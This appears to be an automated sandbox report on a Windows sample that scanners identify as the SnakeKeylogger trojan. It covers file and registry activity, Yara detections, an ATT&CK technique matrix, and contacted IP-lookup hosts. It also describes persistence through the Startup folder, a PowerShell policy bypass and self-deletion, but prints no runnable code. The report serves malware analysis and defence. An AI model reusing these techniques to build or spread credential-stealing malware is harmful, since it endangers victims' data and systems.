            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Users\user\Desktop\upXUt2jZ0S.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1554551898.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1797959827.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: .exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1554551898.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1797959827.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: .exe PID: 7624, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            PowerShell
            12
            Registry Run Keys / Startup Folder
            11
            Process Injection
            111
            Masquerading
            OS Credential Dumping121
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            12
            Registry Run Keys / Startup Folder
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            51
            Virtualization/Sandbox Evasion
            Security Account Manager51
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp
            DCSync22
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            File Deletion
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588147 Sample: upXUt2jZ0S.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 checkip.dyndns.org 2->48 50 2 other IPs or domains 2->50 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Multi AV Scanner detection for dropped file 2->70 74 7 other signatures 2->74 9 upXUt2jZ0S.exe 2 2->9         started        12 .exe 2 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 72 Tries to detect the country of the analysis system (by using the IP) 46->72 process4 dnsIp5 76 Self deletion via cmd or bat file 9->76 78 Bypasses PowerShell execution policy 9->78 17 powershell.exe 13 9->17         started        21 upXUt2jZ0S.exe 15 4 9->21         started        24 .exe 14 2 12->24         started        26 powershell.exe 11 12->26         started        56 127.0.0.1 unknown unknown 14->56 signatures6 process7 dnsIp8 40 C:\Users\user\AppData\Roaming\...\.exe, PE32 17->40 dropped 42 C:\Users\user\...\.exe:Zone.Identifier, ASCII 17->42 dropped 58 Creates executable files without a name 17->58 60 Drops PE files to the startup folder 17->60 62 Powershell drops PE file 17->62 28 conhost.exe 17->28         started        52 checkip.dyndns.com 132.226.247.73, 49738, 49799, 49813 UTMEMUS United States 21->52 54 reallyfreegeoip.org 104.21.48.1, 443, 49761, 49794 CLOUDFLARENETUS United States 21->54 44 C:\Users\user\AppData\...\upXUt2jZ0S.exe.log, ASCII 21->44 dropped 64 Self deletion via cmd or bat file 21->64 30 cmd.exe 21->30         started        32 WerFault.exe 24->32         started        34 conhost.exe 26->34         started        file9 signatures10 process11 process12 36 conhost.exe 30->36         started        38 choice.exe 30->38         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            upXUt2jZ0S.exe68%ReversingLabsWin32.Trojan.SnakeKeylogger
            upXUt2jZ0S.exe61%VirustotalBrowse
            upXUt2jZ0S.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe68%ReversingLabsWin32.Trojan.SnakeKeylogger
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe61%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              high
              reallyfreegeoip.org
              104.21.48.1
              truefalse
                high
                checkip.dyndns.com
                132.226.247.73
                truefalse
                  high
                  15.164.165.52.in-addr.arpa
                  unknown
                  unknownfalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1381308644.0000000005508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/0xd4d/dnSpy/wiki/Debugging-Unity-Games.exe.2.drfalse
                              high
                              http://crl.micropowershell.exe, 00000002.00000002.1384829264.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1563393236.00000000071F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1541702733.0000000004942000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://g.live.com/odclientsettings/Prod-C:edb.log.5.drfalse
                                    high
                                    https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1378357303.00000000044A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1541702733.00000000047F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1541702733.0000000004942000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.org/qupXUt2jZ0S.exe, 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000005.00000003.1371247818.00000294CE670000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1381308644.0000000005508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.org/xml/8.46.123.189$upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002659000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://reallyfreegeoip.orgupXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.000000000262E000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.1560390243.0000000005855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://reallyfreegeoip.orgupXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002659000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.ver)svchost.exe, 00000005.00000002.2594028413.00000294CE884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.orgupXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002659000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.000000000260A000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.00000000030B3000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.00000000030A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.comupXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002708000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.00000000030B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1378357303.00000000044A1000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1541702733.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000A.00000002.1797959827.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1541702733.0000000004942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/upXUt2jZ0S.exe, 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1554551898.0000000002616000.00000004.00000800.00020000.00000000.sdmp, upXUt2jZ0S.exe, 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.48.1
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      132.226.247.73
                                                                      checkip.dyndns.comUnited States
                                                                      16989UTMEMUSfalse
                                                                      IP
                                                                      127.0.0.1
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1588147
                                                                      Start date and time:2025-01-10 21:54:51 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 6m 48s
